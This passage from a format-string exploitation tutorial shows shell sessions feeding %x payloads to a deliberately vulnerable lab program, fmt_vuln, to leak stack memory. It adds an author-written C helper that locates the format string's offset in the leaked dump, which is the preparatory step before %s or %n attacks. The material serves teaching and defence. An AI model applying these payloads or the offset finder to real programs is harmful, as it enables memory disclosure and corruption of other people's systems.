The wrong way to print user-controlled input:
testing
[*] test_val @ 0x08049794 = -72 0xffffffb8
reader@hacking:~/booksrc $
Both methods seem to work with the string testing. But what happens if
the string contains a format parameter? The format function will try to
evaluate the format parameter and fetch the corresponding function argument
from the stack, at an offset from the frame pointer. But as we saw earlier, if
no such argument was actually passed, that offset from the frame pointer
lands on a piece of memory belonging to a preceding stack frame.
reader@hacking:~/booksrc $ ./fmt_vuln testing%x
The right way to print user-controlled input:
testing%x
The wrong way to print user-controlled input:
testingbffff3e0
[*] test_val @ 0x08049794 = -72 0xffffffb8
reader@hacking:~/booksrc $
When the %x format parameter was used, the hexadecimal representation
of a four-byte word from the stack was printed, even though no argument was
supplied for it. Each additional %x consumes the next word up the stack, so
this process can be repeated to examine stack memory.
reader@hacking:~/booksrc $ ./fmt_vuln $(perl -e 'print "%08x."x40')
The right way to print user-controlled input:
%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.
%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.
%08x.%08x.
The wrong way to print user-controlled input:
bffff320.b7fe75fc.00000000.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252
e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.2
52e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e78
38.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.
[*] test_val @ 0x08049794 = -72 0xffffffb8
reader@hacking:~/booksrc $
This is what the lower stack memory looks like. Remember that each
four-byte word is backward, due to the little-endian architecture. The bytes
0x25 , 0x30 , 0x38 , 0x78 , and 0x2e seem to be repeating a lot. Wonder what those
bytes are?
reader@hacking:~/booksrc $ printf "\x25\x30\x38\x78\x2e\n"
%08x.
reader@hacking:~/booksrc $
As you can see, they're the memory for the format string itself. Because
the format function is always in the most recently pushed stack frame (the
one at the lowest address), any copy of the format string that lives anywhere
on the stack sits below the current frame pointer, at a higher memory address,
which is exactly the direction the function walks when it fetches arguments.
This fact can be used to control arguments to the format function: put the
bytes you want as an argument into the format string itself, then use enough
%x parameters to reach them. It is particularly useful with format parameters
that pass by reference, such as %s or %n, because the "argument" they
dereference is then an address of your choosing.
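Finding where the format string's own bytes show up in the dump, and undoing the little-endian byte order, is the step an attacker does by hand before using %s or %n. The following C program automates it. It is an added example, not code from the book or from fmt_vuln: it parses the 40-word dump printed above (copied inline as kStackDump), reports the word index at which the string "%08x." begins, and reassembles the string from the words that follow. It generalises slightly beyond the page in that the needle can be any four-byte marker, not just "%08x."; the function names parse_stack_dump, find_format_string_offset and recover_string are my own.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Stack dump copied from the fmt_vuln "%08x." run above: 40 dot-separated
 * 32-bit words as printed by the vulnerable printf(). */
static const char kStackDump[] =
    "bffff320.b7fe75fc.00000000.78383025.3830252e.30252e78.252e7838.2e783830."
    "78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78."
    "252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025."
    "3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838."
    "2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.";

/* Parse "word.word.word." (hex, as produced by %08x.) into 32-bit values.
 * Returns the number of words stored; stops at the first non-hex token. */
size_t parse_stack_dump(const char *dump, uint32_t *words, size_t max_words) {
    size_t n = 0;
    const char *p = dump;
    while (*p != '\0' && n < max_words) {
        char *end;
        unsigned long v = strtoul(p, &end, 16);
        if (end == p) break;                 /* not a hex digit: stop parsing */
        words[n++] = (uint32_t)v;
        p = end;
        if (*p == '.') p++;                  /* skip the separator */
    }
    return n;
}

/* Write the four bytes of a word in the order they sit in memory on a
 * little-endian machine: least significant byte first. */
void word_to_le_bytes(uint32_t w, unsigned char out[4]) {
    for (int i = 0; i < 4; i++)
        out[i] = (unsigned char)(w >> (8 * i));
}

/* Index of the first dumped word whose in-memory bytes equal the first four
 * bytes of `needle` (the attacker's own format string or a marker such as
 * "AAAA"), or -1 if absent. That index is the number of %x conversions
 * printf consumes before it reaches the string itself, so the string is
 * "argument" index+1. */
int find_format_string_offset(const uint32_t *words, size_t n, const char *needle) {
    if (strlen(needle) < 4) return -1;
    for (size_t i = 0; i < n; i++) {
        unsigned char b[4];
        word_to_le_bytes(words[i], b);
        if (memcmp(b, needle, 4) == 0) return (int)i;
    }
    return -1;
}

/* Reassemble consecutive words from `start` into a printable string,
 * stopping at the first NUL or non-printable byte. Returns the length. */
size_t recover_string(const uint32_t *words, size_t n, size_t start,
                      char *out, size_t out_len) {
    if (out_len == 0) return 0;
    size_t len = 0;
    for (size_t i = start; i < n && len + 1 < out_len; i++) {
        unsigned char b[4];
        word_to_le_bytes(words[i], b);
        for (int j = 0; j < 4 && len + 1 < out_len; j++) {
            if (b[j] < 0x20 || b[j] > 0x7e) { out[len] = '\0'; return len; }
            out[len++] = (char)b[j];
        }
    }
    out[len] = '\0';
    return len;
}

/* Convenience wrappers over the page's dump. */
size_t page_dump_word_count(void) {
    uint32_t words[64];
    return parse_stack_dump(kStackDump, words, 64);
}

int page_dump_offset(void) {
    uint32_t words[64];
    size_t n = parse_stack_dump(kStackDump, words, 64);
    return find_format_string_offset(words, n, "%08x.");
}

int main(void) {
    uint32_t words[64];
    char text[256];
    size_t n = parse_stack_dump(kStackDump, words, 64);
    int off = find_format_string_offset(words, n, "%08x.");
    printf("%zu words parsed\n", n);
    if (off < 0) { puts("format string not found in dump"); return 1; }
    recover_string(words, n, (size_t)off, text, sizeof text);
    printf("format string starts at word %d (printf argument %d)\n", off, off + 1);
    printf("recovered: %s\n", text);
    return 0;
}
```

On the dump above the string starts at word 3, so three %x parameters skip the words that precede it and the fourth reads the first four bytes of the string itself. In practice one prefixes the format string with a distinctive marker (for example "AAAA", 0x41414141 in memory) and searches for that instead of "%08x", which is what the needle argument is for.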